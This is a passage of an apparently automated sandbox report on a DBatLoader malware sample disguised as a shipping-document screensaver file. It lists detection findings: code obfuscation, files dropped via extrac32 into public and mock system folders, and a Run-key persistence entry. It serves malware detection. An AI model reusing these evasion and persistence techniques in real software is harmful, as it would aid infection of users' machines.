0000000B.00000000.1699099885.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000000.1701529353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000D.00000002.1725755882.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000002.1718992252.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000000F.00000000.1717853353.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000002.1747179983.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000016.00000000.1742798028.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000002.1760150963.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001A.00000000.1747931853.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000002.1761722308.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001C.00000000.1760459517.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000002.1764581095.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001D.00000000.1762694348.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000000.1765484467.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001E.00000002.1766577849.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000002.1767658042.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 0000001F.00000000.1766956821.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000002.1768771742.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000020.00000000.1767937417.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000002.1770379704.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 00000021.00000000.1769320960.00007FF70CCA2000.00000002.00000001.01000000.00000007.sdmp, alpha.exe, 000
Source:	Binary string: FodHelper.pdbGCTL source: extrac32.exe, 0000000C.00000002.1700608647.000002990FEE0000.00000004.00000020.00020000.00000000.sdmp, per.exe, 00000011.00000002.1741479037.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe, 00000011.00000000.1725970381.00007FF6FEF9B000.00000002.00000001.01000000.0000000C.sdmp, per.exe.12.dr
Source:	Binary string: reg.pdbGCTL source: extrac32.exe, 00000008.00000002.1693775016.000001FEF3710000.00000004.00000020.00020000.00000000.sdmp, ger.exe, 00000010.00000002.1718611375.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe, 00000010.00000000.1718136951.00007FF7E0A40000.00000002.00000001.01000000.0000000B.sdmp, ger.exe.8.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\Public\Libraries\glrkszlG.pif

Unpacked PE file: 1.2.glrkszlG.pif.400000.0.unpack .text:ER;.data:W;.tls:W;.rdata:R;.idata:R;.edata:R;.rsrc:R; vs . :EW;. :EW;. :R;. :W;. :W;. :W;

Yara detected DBatLoader

Source: Yara match	File source: 39.2.Glzskrlg.PIF.2a20000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 39.2.Glzskrlg.PIF.2a20000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000027.00000002.1859693106.0000000002A20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Binary contains a suspicious time stamp

Source: glrkszlG.pif.0.dr

Static PE information: 0x9E9038DB [Sun Apr 19 22:51:07 2054 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_279567B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,

0_2_279567B9

PE file contains sections with non-standard names

Source: alpha.exe.4.dr	Static PE information: section name: .didat
Source: per.exe.12.dr	Static PE information: section name: .imrsiv

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_40102806 push ecx; ret	0_2_40102819
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028BD2E4 push ecx; mov dword ptr [esp], edx	0_2_028BD2E9
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA2FC push 028CA367h; ret	0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A32FC push eax; ret	0_2_028A3338
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA2F5 push 028CA367h; ret	0_2_028CA35F
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A635A push 028A63B7h; ret	0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A635C push 028A63B7h; ret	0_2_028A63AF
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA0AC push 028CA125h; ret	0_2_028CA11D
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA1F8 push 028CA288h; ret	0_2_028CA280
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028CA144 push 028CA1ECh; ret	0_2_028CA1E4
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A6748 push 028A678Ah; ret	0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028A6746 push 028A678Ah; ret	0_2_028A6782
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AC4FC push ecx; mov dword ptr [esp], edx	0_2_028AC501
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AD530 push 028AD55Ch; ret	0_2_028AD554
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028ACB7C push 028ACD02h; ret	0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B789C push 028B7919h; ret	0_2_028B7911
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028AC8AA push 028ACD02h; ret	0_2_028ACCFA
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B68D8 push 028B6983h; ret	0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B68D6 push 028B6983h; ret	0_2_028B697B
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028C9874 push 028C9A60h; ret	0_2_028C9A58
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B9EBB push 028B9EF4h; ret	0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B9EBC push 028B9EF4h; ret	0_2_028B9EEC
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2EF0 push 028B2F66h; ret	0_2_028B2F5E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B5E0C push ecx; mov dword ptr [esp], edx	0_2_028B5E0E
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2FFB push 028B3049h; ret	0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B2FFC push 028B3049h; ret	0_2_028B3041
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7F18 push 028B7F50h; ret	0_2_028B7F48
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_028B7C7C push 028B7CBEh; ret	0_2_028B7CB6
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_279787DE push dword ptr [ebx]; iretd	0_2_279787E1
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_27974E56 push ecx; ret	0_2_27974E69
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Code function: 0_2_2798DD28 push esp; retf	0_2_2798DD30

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File created: C:\Users\Public\Libraries\glrkszlG.pif			Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Glzskrlg.PIF			Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\cmd.exe

Executable created and started: C:\Windows \System32\per.exe

Jump to behavior

Drops PE files

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Windows \System32\per.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	File created: C:\Users\Public\Libraries\glrkszlG.pif	Jump to dropped file
Source: C:\Windows\SysWOW64\extrac32.exe	File created: C:\Users\Public\Libraries\Glzskrlg.PIF	Jump to dropped file

Drops PE files to the user directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Windows \System32\per.exe

Jump to dropped file

Boot Survival

Drops PE files to the user root directory

Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\alpha.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\xkn.exe	Jump to dropped file
Source: C:\Windows\System32\extrac32.exe	File created: C:\Users\Public\ger.exe	Jump to dropped file

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

Code function: 0_2_2795AB0D OpenSCManagerW,OpenServiceW,CloseServiceHandle,ControlService,QueryServiceStatus,StartServiceW,

0_2_2795AB0D

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Glzskrlg			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Glzskrlg			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe

0_2_27975E5E

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\glrkszlG.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
